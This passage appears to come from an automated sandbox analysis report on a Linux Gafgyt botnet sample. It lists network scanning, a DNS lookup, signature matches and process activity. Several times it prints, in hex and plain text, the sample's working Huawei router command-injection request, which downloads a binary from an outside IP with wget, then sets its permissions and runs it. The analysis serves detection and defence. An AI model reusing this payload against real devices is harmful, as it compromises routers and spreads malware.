            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.233.247.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 182.4.114.153:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.31.115.121:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.53.179.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.105.173.185:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.37.178.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 91.223.198.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 107.217.3.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.1.35.157:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.41.6.219:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.73.127.0:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.12.240.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.13.96.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.78.213.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 155.134.59.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.102.253.31:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 185.242.168.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 218.204.57.202:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.79.241.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.127.217.190:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.127.4.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.63.149.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.125.128.84:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.12.148.119:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 191.152.236.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.156.191.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.60.177.3:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.58.181.103:37215
            Source: global traffic
            HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Connection: keep-alive
            Accept: */*
            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
            Content-Length: 457
            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global traffic
            HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Connection: keep-alive
            Accept: */*
            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
            Content-Length: 457
            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 157.158.188.175
            Source: unknownTCP traffic detected without corresponding DNS query: 41.157.228.113
            Source: unknownTCP traffic detected without corresponding DNS query: 41.219.99.175
            Source: unknownTCP traffic detected without corresponding DNS query: 197.253.112.134
            Source: unknownTCP traffic detected without corresponding DNS query: 171.99.213.77
            Source: unknownTCP traffic detected without corresponding DNS query: 41.20.200.11
            Source: unknownTCP traffic detected without corresponding DNS query: 126.132.247.147
            Source: unknownTCP traffic detected without corresponding DNS query: 8.158.15.21
            Source: unknownTCP traffic detected without corresponding DNS query: 197.165.156.136
            Source: unknownTCP traffic detected without corresponding DNS query: 157.42.65.114
            Source: unknownTCP traffic detected without corresponding DNS query: 157.108.14.149
            Source: unknownTCP traffic detected without corresponding DNS query: 41.35.249.224
            Source: unknownTCP traffic detected without corresponding DNS query: 157.217.145.213
            Source: unknownTCP traffic detected without corresponding DNS query: 41.69.250.238
            Source: unknownTCP traffic detected without corresponding DNS query: 157.235.172.129
            Source: unknownTCP traffic detected without corresponding DNS query: 197.201.116.33
            Source: unknownTCP traffic detected without corresponding DNS query: 41.245.242.131
            Source: unknownTCP traffic detected without corresponding DNS query: 157.211.201.195
            Source: unknownTCP traffic detected without corresponding DNS query: 197.203.8.246
            Source: unknownTCP traffic detected without corresponding DNS query: 197.21.87.136
            Source: unknownTCP traffic detected without corresponding DNS query: 41.106.161.33
            Source: unknownTCP traffic detected without corresponding DNS query: 197.138.118.183
            Source: unknownTCP traffic detected without corresponding DNS query: 84.59.223.137
            Source: unknownTCP traffic detected without corresponding DNS query: 41.170.104.179
            Source: unknownTCP traffic detected without corresponding DNS query: 74.150.93.69
            Source: unknownTCP traffic detected without corresponding DNS query: 157.112.226.179
            Source: unknownTCP traffic detected without corresponding DNS query: 41.194.243.149
            Source: unknownTCP traffic detected without corresponding DNS query: 157.24.174.141
            Source: unknownTCP traffic detected without corresponding DNS query: 197.0.226.18
            Source: unknownTCP traffic detected without corresponding DNS query: 157.209.177.192
            Source: unknownTCP traffic detected without corresponding DNS query: 157.207.229.240
            Source: unknownTCP traffic detected without corresponding DNS query: 185.240.108.115
            Source: unknownTCP traffic detected without corresponding DNS query: 41.97.9.221
            Source: unknownTCP traffic detected without corresponding DNS query: 67.121.157.4
            Source: unknownTCP traffic detected without corresponding DNS query: 41.204.161.23
            Source: unknownTCP traffic detected without corresponding DNS query: 122.247.154.189
            Source: unknownTCP traffic detected without corresponding DNS query: 197.70.109.181
            Source: unknownTCP traffic detected without corresponding DNS query: 197.194.15.96
            Source: unknownTCP traffic detected without corresponding DNS query: 157.19.18.188
            Source: unknownTCP traffic detected without corresponding DNS query: 157.89.32.79
            Source: unknownTCP traffic detected without corresponding DNS query: 41.149.215.72
            Source: unknownTCP traffic detected without corresponding DNS query: 197.27.156.22
            Source: unknownTCP traffic detected without corresponding DNS query: 41.202.21.137
            Source: unknownTCP traffic detected without corresponding DNS query: 197.159.182.121
            Source: unknownTCP traffic detected without corresponding DNS query: 87.188.1.178
            Source: unknownTCP traffic detected without corresponding DNS query: 157.208.158.113
            Source: unknownTCP traffic detected without corresponding DNS query: 58.108.150.242
            Source: unknownTCP traffic detected without corresponding DNS query: 157.209.112.227
            Source: sduVQWDj8L.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: sduVQWDj8L.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknownDNS traffic detected: queries for: kamuiv3.hopto.org

            System Summary

            Source: sduVQWDj8L.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: sduVQWDj8L.elf PID: 6230, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: sduVQWDj8L.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: sduVQWDj8L.elf PID: 6230, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: h/bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
            Source: classification engineClassification label: mal92.troj.linELF@0/0@1/0

            Persistence and Installation Behavior

            Source: /bin/sh (PID: 6237)Chmod executable with 777: /usr/bin/chmod -> chmod 777 \\xff\\xecHbin/busybox
            Source: /bin/sh (PID: 6235)Mkdir executable: /usr/bin/mkdir -> mkdir bin
            Source: /bin/sh (PID: 6237)Chmod executable: /usr/bin/chmod -> chmod 777 \\xff\\xecHbin/busybox
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1582/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/3088/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/230/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/110/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/231/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/111/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/232/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1579/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/112/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/233/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1699/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/113/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/234/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1335/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1698/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/114/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/235/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1334/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1576/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/2302/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/115/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/236/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/116/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/237/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/117/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/118/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/910/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/119/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/912/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/10/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/2307/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/11/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/918/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/6241/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/12/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/13/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/14/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/15/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/16/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/6244/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/17/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/18/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1594/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/120/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/121/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1349/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/122/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/243/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/123/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/2/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/124/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/3/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/4/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/125/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/126/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1344/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1465/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1586/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/127/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/6/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/248/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/128/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/249/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1463/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/800/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/9/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/801/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/20/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/21/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1900/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/22/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/23/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/24/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/25/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/26/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/27/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/28/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/29/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/491/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/250/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/130/cmdline
